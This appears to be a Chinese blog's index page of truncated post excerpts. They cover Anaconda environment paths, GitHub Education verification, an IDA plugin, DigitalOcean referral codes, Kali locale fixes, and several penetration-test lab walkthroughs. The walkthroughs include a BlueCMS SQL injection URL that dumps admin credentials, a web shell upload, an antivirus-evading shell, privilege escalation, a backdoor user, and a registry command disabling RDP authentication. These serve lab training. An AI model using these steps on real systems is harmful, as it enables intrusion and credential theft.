/IMG-20241224174522459.png)
🌟 Anaconda虚拟环境路径配置指南 🌟
🔍 基本介绍🐍 Anaconda 是在 PyCharm 等 IDE 中创建虚拟环境的软件🔧 conda 是用于创建虚拟环境的命令
⚠️ 存在的问题1️⃣ 默认路径问题🖥️ 用 conda 创建虚拟环境时,默认安装在:C:\Users\用户名\.conda\envs🎯 而我希望安装在自定义路径(如 F:\Anaconda\envs)
2️⃣ 路径优先级问题🔍 使用 conda config --show 查看时:
目标路径 D:\Anaconda\envs 存在
但不在首行(首行仍是 C 盘路径)
3️⃣ 修改配置无效⚙️ 调整路径优先级后:
D:\Anaconda\envs 显示为首选项
但实际创建时仍安装在 C 盘
🛠️ 解决方式1️⃣ 安装选项📌 安装时选择 Just Me(不要选 All Users)
2️⃣ 指定路径创建💻 命令示例:conda create -p D:\Anaconda\envs\aaa python=3.7❌ 但可能出现权限报错
3️⃣ 解决权限问题🔐 操作步骤:
右键 D: ...
自2025年4月10日起,Github的教育认证地址改为GitHub 的 ·软件构建地点自2025年5月13日起,Github的教育认证方式新增本地文件上传功能(原本只支持调用摄像头拍摄)在申请之前我们需要先做好准备事项:1、准备一个教育邮箱(edu)2、准备一份证明材料:可以是学信网或者学生证(最好标有身份信息和毕业日期)3、将edu邮箱添加进入github账号中,电子邮件设置4、修改个人主页信息和账单信息,需和证明材料信息保持一致5、开启双重身份认证(2fa),Account security6、申请时关闭vpn,地址须在学校7、若已完成前6项,但仍一直显示你不在学校,有小概率是github官方将你学校地址信息录入错误,需自行提交工单(小编我就是这种情况,折腾了好久)GitHub Education - GitHub 支持
🚀 快速上手 IDA-Pro-MCP:为逆向分析插上翅膀在 CTF 逆向题中,我们经常需要跨工具分析 —— 比如 IDA 中查看反汇编结构,VSCode 中编辑注释或脚本,Python 工具处理结构体甚至 patch。ida-pro-mcp 是一款由 mrexodia 开发的插件,完美解决了 IDA 和外部编辑器之间的交互障碍。
🧠 本文目标:用最少的步骤,教你快速配置和上手 ida-pro-mcp,让你的 IDA 成为一个真正高效的逆向 IDE。
📦 一、项目简介
项目地址:https://github.com/mrexodia/ida-pro-mcp
全称:IDA Pro Multi-Client Plugin
核心功能:
通过 mcp-server 建立本地通信端口
支持外部工具(如 VSCode 插件 CLine)与 IDA 联动
可双向操作函数、地址、结构体等数据
🔧 二、环境准备
IDA Pro 8.3+(推荐9.0)
Python 3.x
VSCode(建议安装 CLine 插件)
📥 三、安装步骤(推荐方式)✅ 1. 安装( ...
最近原本的华为云的云服务器快到期了,想着在搞一台海外的VPS玩玩,在大佬的建议下,选择了Digital ocean(数字海洋,简称DO),因为可以通过新人注册和github学生包白嫖🤪
1、首先,我们需要注册一个账号,点击注册DO)直接送$200 60天期限,注册后还可以自行吃码$200:ReferreeNew2209,随便吃,如何这个码不能用试试SAMMY60DAY 和 ACTIVATE60。
2、付款验证可选支付宝、信用卡或者PayPal,信用卡没有验证费用,PayPal则需要最低$5作为验证金,明确说明了:不退,倒是可以作为你的账户余额,推荐使用25美金以上验证通过率较高。
3、注册后,来搞一个GitHub的学生包,这个东西有edu邮箱可以自己注册,如果没有可以买,价格10——20,购买前请确认有do的试用金(特便宜的有的被提走了),到 https://education.github.com/experiences/intro_to_web_dev使用账号登陆github。
接下来分享一些好玩的脚本和项目
科技lion脚本
1Panel(管理面板)
mcp-1Panel ...
信息收集使用ThinkPHP综合利用工具探测一下漏洞漏洞利用成功,上传一句话木马,使用蚁剑连接,发现连不上,返回网页,应该是被杀掉了。。发现有很多杀软,尝试了很多生成免杀Shell的工具,最终使用ByPassGodzilla成功利用。将生成的文件内容上传,使用哥斯拉来连接
我这里切换了一下代理,将靶机代理转到kali虚拟机中,并使用iox做了个转发,使得物理机也能访问目标网站上传CS的攻击载荷并运行,成功上线CS,接下来要做的就是权限提升,因为目前权限为nt authority\local service
权限提升使用ms16-075
GetFlagshell type C:\flag.txtgo-flag{137ee666-7623-4550-85bd-e8163d91c9b0}
1231.添加后门用户2.开启远程桌面,rdp的网络级别身份验证出问题,所以彻底禁用 NLA,就可以成功连接shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wi ...
信息收集1fscan -h 192.168.10.0/24 -p 0-65535
flag1BlueCMSblueCMS v1.6 sp1 ad_js.php SQL注入漏洞1http://192.168.10.10:5820/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,concat(admin_name,0x7C0D0A,pwd),concat(admin_name,0x7C0D0A,pwd)%20from%20blue_admin%20where%20admin_id=1
访问该页面查看源代码可以看到管理员账户密码admin|\r\na66abb5684c45962d887564f08346e8d
\r\n是转义字符,后面的是密码a66abb5684c45962d887564f08346e8d的MD5加密后的值
后台登陆地址http://192.168.10.10:5820/admin,使用账号admin,密码admin123456,成功登录
3. 在第3处右键选择使用新标签页打开
GetFla ...
信息收集1234567891011121314151617181920212223242526272829303132sudo fscan -h 192.168.10.0/24 -p 0-65535 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4start infoscan(icmp) Target 192.168.10.10 is alive(icmp) Target 192.168.10.233 is alive[*] Icmp alive hosts len is: 2192.168.10.233:22 op ...
信息收集123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960fscan -h 192.168.10.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| <\____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 2.0.0[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27 ...
VPN环境配置使用本地工具连接openvpn
windows安装OpenVPN Connect,将cyberstrikelab.com-lab1上传
linuxopenvpn cyberstrikelab.com-lab1
第一个flag查看本地ip,可以发现多了一个IP地址,是openvpn分配的,但是这个ip一个时间只能一台机器使用,虚拟机使用nat也不行!
接着就可以根据题目要求看看192.168.10.0/24网段的所有主机,分配的172IP可以连接192.168.10.0网段
使用fscan
12345678910111213141516171819202122232425262728293031323334353637383940PS C:\Users\11> fscan -h 192.168.10.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / ...
Kali Linux 设置中文失败?别慌,救星来了!嘿,朋友们!如果你在折腾 Kali Linux 的时候,不小心把中文设置搞砸了,别担心,今天这篇文章就是你的救星!跟着我一步步来,保证让你的 Kali Linux 乖乖变回中文界面。
问题背景Kali Linux 是一款超酷的渗透测试工具,但有时候,它的语言设置会让人头大。如果你在设置中文时遇到了类似这样的错误:
1*** update-locale: Error: invalid locale settings: LANGUAGE=zh_CN:zh LC_ALL=zh_CN.UTF-8 LANG=zh_CN.UTF-8
或者:
1locale: Cannot set LC_CTYPE to default locale: No such file or directory
别慌,这其实是个常见的小问题,只需要几步就能搞定。
解决方案第一步:检查语言环境是否生成先运行以下命令,看看系统里有没有生成中文语言环境:
1locale -a
如果里面没有 zh_CN.UTF-8,那接下来的步骤就很重要了。
第二步:生成中文语言环境编辑 /et ...
